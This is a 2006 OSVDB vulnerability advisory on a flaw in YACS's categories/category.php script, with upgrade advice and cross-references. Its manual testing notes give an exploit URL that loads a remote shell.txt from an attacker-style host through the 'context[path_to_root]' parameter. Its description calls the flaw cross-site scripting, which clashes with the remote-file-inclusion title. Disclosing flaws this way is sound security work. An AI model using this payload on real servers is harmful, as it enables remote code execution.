YACS categories/category.php context[path_to_root] Variable Remote File Inclusion

2006-08-29T13:25:42
ID OSVDB:31302
Type osvdb
Reporter matasanos()
Modified 2006-08-29T13:25:42

Description

Vulnerability Description

YACS contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'context[path_to_root]' variable upon submission to the 'categories/category.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 6.9 or higher, as it has been reported to fix this vulnerability. In addition, the vendor has released a patch for some older versions.

Short Description

YACS contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'context[path_to_root]' variable upon submission to the 'categories/category.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/[patch]/yacs/categories/category.php?context[path_to_root]=http://url--ataca.org/shell.txt?

References:

Vendor Specific News/Changelog Entry: http://www.yetanothercommunitysystem.com/yacs/articles/view.php/1664 Secunia Advisory ID:21680 Related OSVDB ID: 31304 Related OSVDB ID: 31307 Related OSVDB ID: 31309 Related OSVDB ID: 31303 Related OSVDB ID: 31305 Related OSVDB ID: 31308 Related OSVDB ID: 31310 Related OSVDB ID: 31301 Related OSVDB ID: 31306 Generic Exploit URL: http://milw0rm.com/exploits/2282 CVE-2006-4559